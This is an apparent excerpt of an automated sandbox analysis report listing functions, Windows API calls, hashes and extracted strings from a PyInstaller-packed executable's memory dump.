RtlLookupFunctionEntry.KERNEL32 ref: 00007FF64777C6DF
RtlVirtualUnwind.KERNEL32 ref: 00007FF64777C720
IsDebuggerPresent.KERNEL32 ref: 00007FF64777C774
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF64777C795
UnhandledExceptionFilter.KERNEL32 ref: 00007FF64777C7A0

Memory Dump Source

Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true

Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: be1c9f70274c1bfa0c57ec5397cb0351ad5ab78a1ed88338b70abc701b0ce300
Instruction ID: b850aa43fda1cb7375cb7b01eb66d12eb4b31d3b141f91a79e812f988a9a9e07
Opcode Fuzzy Hash: be1c9f70274c1bfa0c57ec5397cb0351ad5ab78a1ed88338b70abc701b0ce300
Instruction Fuzzy Hash: 79313E72609A81C6EB60BF60E8407ED7365FB98748F84443ADA4D87A94DF38D648C718

Function 00007FF64778ACD8 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 00007FF64778AD51
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF64778AD69
RtlVirtualUnwind.KERNEL32 ref: 00007FF64778ADA4
IsDebuggerPresent.KERNEL32 ref: 00007FF64778ADDD
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF64778ADE7
UnhandledExceptionFilter.KERNEL32 ref: 00007FF64778ADF2

Memory Dump Source

Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true

Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: 008726ea591ffa8193f39527e8fee48c852db3d8167e5981d4ed2afc12fe266b
Instruction ID: e76022d6409f48cacb7ad11e3c524ba6742ddd7192b29436276dd335c29fa924
Opcode Fuzzy Hash: 008726ea591ffa8193f39527e8fee48c852db3d8167e5981d4ed2afc12fe266b
Instruction Fuzzy Hash: 7A317332608B81C6EB60EF25E8402AE73A4FB88754F910536EE8D83B68DF3CD555CB04

Function 00007FF647791FE4 Relevance: 7.8, APIs: 5, Instructions: 282COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF647792030
FindFirstFileExW.KERNEL32 ref: 00007FF64779213A

Memory Dump Source

Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true

Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd

Similarity

API ID: FileFindFirst_invalid_parameter_noinfo
String ID:
API String ID: 2227656907-0
Opcode ID: 99e62b62205f6f1247891fef44c3d84ab051c8482e1ee44e82008766d3ad9720
Instruction ID: 78b0a39f6bdcb8ac2f1b44911a985a9e812be0704cf3a62ed96c8278b350dd50
Opcode Fuzzy Hash: 99e62b62205f6f1247891fef44c3d84ab051c8482e1ee44e82008766d3ad9720
Instruction Fuzzy Hash: 80B1D3A2B1E682C1FA60FB22DA005B96351EB64BE4F854131EF5D87BD5DE3CE445C308

Function 00007FF6477751F0 Relevance: 233.1, APIs: 44, Strings: 89, Instructions: 363libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,?,00000000,00007FF64777346E), ref: 00007FF647775200
GetProcAddress.KERNEL32(?,?,00000000,00007FF64777346E), ref: 00007FF64777523A
GetProcAddress.KERNEL32(?,?,00000000,00007FF64777346E), ref: 00007FF64777525F
GetProcAddress.KERNEL32(?,?,00000000,00007FF64777346E), ref: 00007FF647775284
GetProcAddress.KERNEL32(?,?,00000000,00007FF64777346E), ref: 00007FF6477752AC
GetProcAddress.KERNEL32(?,?,00000000,00007FF64777346E), ref: 00007FF6477752D4
GetProcAddress.KERNEL32(?,?,00000000,00007FF64777346E), ref: 00007FF6477752FC
GetProcAddress.KERNEL32(?,?,00000000,00007FF64777346E), ref: 00007FF647775324
GetProcAddress.KERNEL32(?,?,00000000,00007FF64777346E), ref: 00007FF64777534C
GetProcAddress.KERNEL32(?,?,00000000,00007FF64777346E), ref: 00007FF647775374

Strings

Failed to get address for PyConfig_Read, xrefs: 00007FF647775386
PyUnicode_Join, xrefs: 00007FF647775892
PyObject_Str, xrefs: 00007FF6477756DA
Failed to get address for PyConfig_InitIsolatedConfig, xrefs: 00007FF64777535E
PyUnicode_FromString, xrefs: 00007FF64777586A
Failed to get address for PyMarshal_ReadObjectFromString, xrefs: 00007FF6477755DE
PyImport_ImportModule, xrefs: 00007FF647775572
PyUnicode_Replace, xrefs: 00007FF6477758BA
PyImport_ExecCodeModule, xrefs: 00007FF64777554A
Failed to get address for PyEval_EvalCode, xrefs: 00007FF647775516
PyList_Append, xrefs: 00007FF64777559A
PyImport_AddModule, xrefs: 00007FF647775522
Failed to get address for PyErr_Occurred, xrefs: 00007FF64777549E
Failed to get address for PyConfig_SetBytesString, xrefs: 00007FF6477753AE
PyRun_SimpleStringFlags, xrefs: 00007FF64777572A
PyErr_Clear, xrefs: 00007FF64777540A
Py_InitializeFromConfig, xrefs: 00007FF6477752A2
PyObject_SetAttrString, xrefs: 00007FF6477756B2
Failed to get address for PyConfig_SetString, xrefs: 00007FF6477753D6
Py_DecRef, xrefs: 00007FF6477751F6
PyConfig_Clear, xrefs: 00007FF64777531A
Failed to get address for PyImport_ImportModule, xrefs: 00007FF64777558E
Failed to get address for PyPreConfig_InitIsolatedConfig, xrefs: 00007FF64777571E
Failed to get address for PyObject_SetAttrString, xrefs: 00007FF6477756CE
PyUnicode_AsUTF8, xrefs: 00007FF6477757CA
PyMarshal_ReadObjectFromString, xrefs: 00007FF6477755C2
Failed to get address for Py_PreInitialize, xrefs: 00007FF64777530E
Py_IsInitialized, xrefs: 00007FF6477752CA
Failed to get address for PyImport_ExecCodeModule, xrefs: 00007FF647775566
Failed to get address for PyUnicode_AsUTF8, xrefs: 00007FF6477757E6
PyUnicode_Decode, xrefs: 00007FF6477757F2
PyConfig_SetBytesString, xrefs: 00007FF647775392
Failed to get address for PyRun_SimpleStringFlags, xrefs: 00007FF647775746
Failed to get address for PyUnicode_Decode, xrefs: 00007FF64777580E
Failed to get address for Py_Finalize, xrefs: 00007FF647775296
Py_ExitStatusException, xrefs: 00007FF647775255
Failed to get address for PyModule_GetDict, xrefs: 00007FF64777562E
Failed to get address for PyImport_AddModule, xrefs: 00007FF64777553E
PyEval_EvalCode, xrefs: 00007FF6477754FA
PyModule_GetDict, xrefs: 00007FF647775612
Failed to get address for PyErr_Print, xrefs: 00007FF6477754C6
Failed to get address for PyUnicode_DecodeFSDefault, xrefs: 00007FF647775836
Failed to get address for PySys_SetObject, xrefs: 00007FF6477757BE
PyErr_NormalizeException, xrefs: 00007FF64777545A
Failed to get address for PyErr_Clear, xrefs: 00007FF647775426
PyPreConfig_InitIsolatedConfig, xrefs: 00007FF647775702
Failed to get address for PyConfig_Clear, xrefs: 00007FF647775336
Failed to get address for Py_DecodeLocale, xrefs: 00007FF64777524C
Failed to get address for Py_IsInitialized, xrefs: 00007FF6477752E6
PyConfig_SetWideStringList, xrefs: 00007FF6477753E2
Failed to get address for PyUnicode_Replace, xrefs: 00007FF6477758D6
PyObject_CallFunction, xrefs: 00007FF64777563A
PyErr_Occurred, xrefs: 00007FF647775482
Failed to get address for PyUnicode_Join, xrefs: 00007FF6477758AE
Failed to get address for PyObject_CallFunction, xrefs: 00007FF647775656
Failed to get address for PyErr_Fetch, xrefs: 00007FF64777544E
Failed to get address for PyObject_CallFunctionObjArgs, xrefs: 00007FF64777567E
PyUnicode_DecodeFSDefault, xrefs: 00007FF64777581A
PyErr_Fetch, xrefs: 00007FF647775432
Failed to get address for Py_ExitStatusException, xrefs: 00007FF647775271
Py_Finalize, xrefs: 00007FF64777527A
Failed to get address for PySys_GetObject, xrefs: 00007FF647775796
PyConfig_InitIsolatedConfig, xrefs: 00007FF647775342
PyObject_GetAttrString, xrefs: 00007FF64777568A
PyConfig_Read, xrefs: 00007FF64777536A
PyObject_CallFunctionObjArgs, xrefs: 00007FF647775662
Py_DecodeLocale, xrefs: 00007FF647775230
Failed to get address for PyUnicode_FromFormat, xrefs: 00007FF64777585E
PyMem_RawFree, xrefs: 00007FF6477755EA
Failed to get address for PyMem_RawFree, xrefs: 00007FF647775606
GetProcAddress, xrefs: 00007FF647775219
Failed to get address for PyErr_Restore, xrefs: 00007FF6477754EE
PySys_SetObject, xrefs: 00007FF6477757A2
Failed to get address for PyUnicode_FromString, xrefs: 00007FF647775886
Failed to get address for PyErr_NormalizeException, xrefs: 00007FF647775476
Failed to get address for PyObject_Str, xrefs: 00007FF6477756F6
Failed to get address for PyObject_GetAttrString, xrefs: 00007FF6477756A6
Failed to get address for PyStatus_Exception, xrefs: 00007FF64777576E
PyErr_Print, xrefs: 00007FF6477754AA
Failed to get address for Py_InitializeFromConfig, xrefs: 00007FF6477752BE
PyStatus_Exception, xrefs: 00007FF647775752
Failed to get address for PyList_Append, xrefs: 00007FF6477755B6
PyUnicode_FromFormat, xrefs: 00007FF647775842
Py_PreInitialize, xrefs: 00007FF6477752F2
Failed to get address for PyConfig_SetWideStringList, xrefs: 00007FF6477753FE
PyErr_Restore, xrefs: 00007FF6477754D2
PySys_GetObject, xrefs: 00007FF64777577A
Failed to get address for Py_DecRef, xrefs: 00007FF647775212
PyConfig_SetString, xrefs: 00007FF6477753BA

Memory Dump Source

Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true

Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd

Similarity

API ID: AddressProc
String ID: Failed to get address for PyConfig_Clear$Failed to get address for PyConfig_InitIsolatedConfig$Failed to get address for PyConfig_Read$Failed to get address for PyConfig_SetBytesString$Failed to get address for PyConfig_SetString$Failed to get address for PyConfig_SetWideStringList$Failed to get address for PyErr_Clear$Failed to get address for PyErr_Fetch$Failed to get address for PyErr_NormalizeException$Failed to get address for PyErr_Occurred$Failed to get address for PyErr_Print$Failed to get address for PyErr_Restore$Failed to get address for PyEval_EvalCode$Failed to get address for PyImport_AddModule$Failed to get address for PyImport_ExecCodeModule$Failed to get address for PyImport_ImportModule$Failed to get address for PyList_Append$Failed to get address for PyMarshal_ReadObjectFromString$Failed to get address for PyMem_RawFree$Failed to get address for PyModule_GetDict$Failed to get address for PyObject_CallFunction$Failed to get address for PyObject_CallFunctionObjArgs$Failed to get address for PyObject_GetAttrString$Failed to get address for PyObject_SetAttrString$Failed to get address for PyObject_Str$Failed to get address for PyPreConfig_InitIsolatedConfig$Failed to get address for PyRun_SimpleStringFlags$Failed to get address for PyStatus_Exception$Failed to get address for PySys_GetObject$Failed to get address for PySys_SetObject$Failed to get address for PyUnicode_AsUTF8$Failed to get address for PyUnicode_Decode$Failed to get address for PyUnicode_DecodeFSDefault$Failed to get address for PyUnicode_FromFormat$Failed to get address for PyUnicode_FromString$Failed to get address for PyUnicode_Join$Failed to get address for PyUnicode_Replace$Failed to get address for Py_DecRef$Failed to get address for Py_DecodeLocale$Failed to get address for Py_ExitStatusException$Failed to get address for Py_Finalize$Failed to get address for Py_InitializeFromConfig$Failed to get address for Py_IsInitialized$Failed to get address for Py_PreInitialize$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyList_Append$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
API String ID: 190572456-4266016200
Opcode ID: f2f88704c5d1e061734efcee993fe9c6dd7b1185595c7391647c05c7e9d36fbf
Instruction ID: 1cec2e6d1bb4dab7240a1d504777bcd3aeefa3893e5fcfb38cfd9083e5259b9b
Opcode Fuzzy Hash: f2f88704c5d1e061734efcee993fe9c6dd7b1185595c7391647c05c7e9d36fbf
Instruction Fuzzy Hash: 2D127CE4A4EB03D1FE55FB28AC5117426A2AF29794FD46835CC0ED62A4EF7CF558820C

Function 00007FF647776F00 Relevance: 164.8, APIs: 31, Strings: 63, Instructions: 263libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 00007FF647776F17
GetProcAddress.KERNEL32 ref: 00007FF647776F56
GetProcAddress.KERNEL32 ref: 00007FF647776F7B
GetProcAddress.KERNEL32 ref: 00007FF647776FA0
GetProcAddress.KERNEL32 ref: 00007FF647776FC8
GetProcAddress.KERNEL32 ref: 00007FF647776FF0
GetProcAddress.KERNEL32 ref: 00007FF647777018
GetProcAddress.KERNEL32 ref: 00007FF647777040
GetProcAddress.KERNEL32 ref: 00007FF647777068

Strings

Failed to get address for Tcl_ThreadQueueEvent, xrefs: 00007FF64777716A
Tcl_EvalObjv, xrefs: 00007FF64777732E
Tcl_DeleteInterp, xrefs: 00007FF64777700E
Tcl_ConditionWait, xrefs: 00007FF647777126
Failed to get address for Tcl_SetVar2, xrefs: 00007FF6477771E2
Failed to get address for Tcl_Free, xrefs: 00007FF64777739A
Failed to get address for Tcl_GetCurrentThread, xrefs: 00007FF64777707A
Failed to get address for Tcl_FindExecutable, xrefs: 00007FF647776F8D
Tcl_NewByteArrayObj, xrefs: 00007FF647777266
Failed to get address for Tcl_ThreadAlert, xrefs: 00007FF647777192
Failed to get address for Tcl_GetVar2, xrefs: 00007FF6477771BA
Tcl_MutexLock, xrefs: 00007FF647777086
Tcl_ConditionFinalize, xrefs: 00007FF6477770D6
Failed to get address for Tcl_GetString, xrefs: 00007FF647777232
Tcl_Finalize, xrefs: 00007FF647776FBE
Failed to get address for Tk_GetNumMainWindows, xrefs: 00007FF6477773EA
Failed to get address for Tcl_CreateObjCommand, xrefs: 00007FF64777720A
Tcl_CreateObjCommand, xrefs: 00007FF6477771EE
Tk_Init, xrefs: 00007FF6477773A6
Tcl_Free, xrefs: 00007FF64777737E
Failed to get address for Tcl_CreateThread, xrefs: 00007FF647777052
Tcl_ThreadQueueEvent, xrefs: 00007FF64777714E
Failed to get address for Tcl_MutexLock, xrefs: 00007FF6477770A2
Tcl_GetVar2, xrefs: 00007FF64777719E
Tcl_DoOneEvent, xrefs: 00007FF647776F96
Tcl_FinalizeThread, xrefs: 00007FF647776FE6
Tcl_NewStringObj, xrefs: 00007FF64777723E
Failed to get address for Tcl_EvalEx, xrefs: 00007FF647777322
Failed to get address for Tcl_Init, xrefs: 00007FF647776F29
Tcl_GetString, xrefs: 00007FF647777216
Failed to get address for Tcl_SetVar2Ex, xrefs: 00007FF6477772AA
Tcl_ThreadAlert, xrefs: 00007FF647777176
Tcl_MutexUnlock, xrefs: 00007FF6477770AE
Failed to get address for Tcl_DoOneEvent, xrefs: 00007FF647776FB2
Failed to get address for Tcl_EvalFile, xrefs: 00007FF6477772FA
Tcl_ConditionNotify, xrefs: 00007FF6477770FE
Failed to get address for Tcl_Finalize, xrefs: 00007FF647776FDA
Tcl_Alloc, xrefs: 00007FF647777356
Tcl_GetObjResult, xrefs: 00007FF6477772B6
Tcl_EvalFile, xrefs: 00007FF6477772DE
Failed to get address for Tcl_EvalObjv, xrefs: 00007FF64777734A
Tcl_EvalEx, xrefs: 00007FF647777306
Failed to get address for Tcl_GetObjResult, xrefs: 00007FF6477772D2
Tcl_SetVar2, xrefs: 00007FF6477771C6
Failed to get address for Tcl_CreateInterp, xrefs: 00007FF647776F68
Tcl_SetVar2Ex, xrefs: 00007FF64777728E
Failed to get address for Tcl_ConditionFinalize, xrefs: 00007FF6477770F2
Failed to get address for Tcl_Alloc, xrefs: 00007FF647777372
Failed to get address for Tcl_DeleteInterp, xrefs: 00007FF64777702A
Tcl_GetCurrentThread, xrefs: 00007FF64777705E
Tcl_CreateInterp, xrefs: 00007FF647776F4C
Failed to get address for Tcl_NewByteArrayObj, xrefs: 00007FF647777282
Tcl_Init, xrefs: 00007FF647776F10
Tk_GetNumMainWindows, xrefs: 00007FF6477773CE
Failed to get address for Tcl_ConditionWait, xrefs: 00007FF647777142
Failed to get address for Tcl_ConditionNotify, xrefs: 00007FF64777711A
Tcl_CreateThread, xrefs: 00007FF647777036
GetProcAddress, xrefs: 00007FF647776F30
Failed to get address for Tcl_MutexUnlock, xrefs: 00007FF6477770CA
Tcl_FindExecutable, xrefs: 00007FF647776F71
Failed to get address for Tk_Init, xrefs: 00007FF6477773C2
Failed to get address for Tcl_NewStringObj, xrefs: 00007FF64777725A
Failed to get address for Tcl_FinalizeThread, xrefs: 00007FF647777002

Memory Dump Source

Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true

Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd

Similarity

API ID: AddressProc
String ID: Failed to get address for Tcl_Alloc$Failed to get address for Tcl_ConditionFinalize$Failed to get address for Tcl_ConditionNotify$Failed to get address for Tcl_ConditionWait$Failed to get address for Tcl_CreateInterp$Failed to get address for Tcl_CreateObjCommand$Failed to get address for Tcl_CreateThread$Failed to get address for Tcl_DeleteInterp$Failed to get address for Tcl_DoOneEvent$Failed to get address for Tcl_EvalEx$Failed to get address for Tcl_EvalFile$Failed to get address for Tcl_EvalObjv$Failed to get address for Tcl_Finalize$Failed to get address for Tcl_FinalizeThread$Failed to get address for Tcl_FindExecutable$Failed to get address for Tcl_Free$Failed to get address for Tcl_GetCurrentThread$Failed to get address for Tcl_GetObjResult$Failed to get address for Tcl_GetString$Failed to get address for Tcl_GetVar2$Failed to get address for Tcl_Init$Failed to get address for Tcl_MutexLock$Failed to get address for Tcl_MutexUnlock$Failed to get address for Tcl_NewByteArrayObj$Failed to get address for Tcl_NewStringObj$Failed to get address for Tcl_SetVar2$Failed to get address for Tcl_SetVar2Ex$Failed to get address for Tcl_ThreadAlert$Failed to get address for Tcl_ThreadQueueEvent$Failed to get address for Tk_GetNumMainWindows$Failed to get address for Tk_Init$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
API String ID: 190572456-2208601799
Opcode ID: 08011e4291223f8c8b87355f84bdba84e3d11561fc99f88d49761070ad3606f6
Instruction ID: 3a536661349f05444bad9fa7ba35cb0ea6e6bdc31bd08bfbf8169108362ded75
Opcode Fuzzy Hash: 08011e4291223f8c8b87355f84bdba84e3d11561fc99f88d49761070ad3606f6
Instruction Fuzzy Hash: AFE1BEA4A1EB43D1FA59BB19A89117423A5EF24794FD49435CC0EC63A8EFBCF548830C

Function 00007FF6477712B0 Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 136COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF647772B30: MessageBoxW.USER32 ref: 00007FF647772C05

_fread_nolock.LIBCMT ref: 00007FF647771499

Strings

malloc, xrefs: 00007FF647771377
Failed to extract %s: failed to open archive file!, xrefs: 00007FF6477712FE
%s%c%s, xrefs: 00007FF6477713EE
Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF64777132B
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF6477714BF
fseek, xrefs: 00007FF647771332
\, xrefs: 00007FF6477713F5
fread, xrefs: 00007FF6477714C6
Failed to extract %s: failed to allocate data buffer (%u bytes)!, xrefs: 00007FF647771370

Memory Dump Source

Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true

Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd

Similarity

API ID: Message_fread_nolock
String ID: %s%c%s$Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$\$fread$fseek$malloc
API String ID: 3065259568-2316137593
Opcode ID: b82510a0132d6c3f7a1a00662aac91967cc70fc2dc9055a249cbe177eb6fa99c
Instruction ID: e690f0cd5099a3525b1a82deb3da532a6d658e78f171e371f4e79040d1104310
Opcode Fuzzy Hash: b82510a0132d6c3f7a1a00662aac91967cc70fc2dc9055a249cbe177eb6fa99c
Instruction Fuzzy Hash: 1151AD61A0D682C6FA20BB21A8516FA6394EF847C4FD04431EE5DC7B96EE7CF545C348

Function 00007FF6477723F0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

GetDC.USER32 ref: 00007FF64777241B
SelectObject.GDI32 ref: 00007FF647772462
DrawTextW.USER32 ref: 00007FF647772485
SelectObject.GDI32 ref: 00007FF64777249B
ReleaseDC.USER32 ref: 00007FF6477724AB
MoveWindow.USER32 ref: 00007FF6477724FB
MoveWindow.USER32 ref: 00007FF64777253B
MoveWindow.USER32 ref: 00007FF64777258E
MoveWindow.USER32 ref: 00007FF6477725D6

Strings

P%, xrefs: 00007FF64777246F

Memory Dump Source

Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true

Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd

Similarity

API ID: MoveWindow$ObjectSelect$DrawReleaseText
String ID: P%
API String ID: 2147705588-2959514604
Opcode ID: 7645c0c2d2fce03d3aab2d1fd33ee4a3925b53edade4cf92fedf68089910dc30
Instruction ID: e4c69914866510cd258ef8574464971de9337f4612f5f863e2ae0ac817e63a9d
Opcode Fuzzy Hash: 7645c0c2d2fce03d3aab2d1fd33ee4a3925b53edade4cf92fedf68089910dc30
Instruction Fuzzy Hash: F751F8666187A1C6E634AF26E0181BAB7A1F798B61F404121EFDE83694DF3CD085DB14

Function 00007FF647778570 Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 52windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,00007FF647772A5E,?,?,?,?,?,?,?,?,?,?,?,00007FF64777101D), ref: 00007FF647778597
FormatMessageW.KERNEL32 ref: 00007FF6477785C6
WideCharToMultiByte.KERNEL32 ref: 00007FF64777861C

Part of subcall function 00007FF6477729E0: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF6477788F2,?,?,?,?,?,?,?,?,?,?,?,00007FF64777101D), ref: 00007FF647772A14
Part of subcall function 00007FF6477729E0: MessageBoxW.USER32 ref: 00007FF647772AF0

Strings

WideCharToMultiByte, xrefs: 00007FF64777862D
FormatMessageW, xrefs: 00007FF6477785D7
No error messages generated., xrefs: 00007FF6477785D0
Failed to encode wchar_t as UTF-8., xrefs: 00007FF647778626
PyInstaller: FormatMessageW failed., xrefs: 00007FF6477785E3
PyInstaller: pyi_win32_utils_to_utf8 failed., xrefs: 00007FF647778639

Memory Dump Source

Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true

Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd

Similarity

API ID: ErrorLastMessage$ByteCharFormatMultiWide
String ID: Failed to encode wchar_t as UTF-8.$FormatMessageW$No error messages generated.$PyInstaller: FormatMessageW failed.$PyInstaller: pyi_win32_utils_to_utf8 failed.$WideCharToMultiByte
API String ID: 2920928814-2573406579
Opcode ID: f8b909e9681ff6aa95198e912ee695dc1f7db9a724790c30e57e4941c2966439
Instruction ID: 2b175daff84126e2e5470b6c47678a290505972b04f97cbdd9865a6c9ae8c91e
Opcode Fuzzy Hash: f8b909e9681ff6aa95198e912ee695dc1f7db9a724790c30e57e4941c2966439
Instruction Fuzzy Hash: AA217CB1A0CA42D1FB60BB11E89427A7261FF98388FC44036EE4DC26A5EF3CE515C748

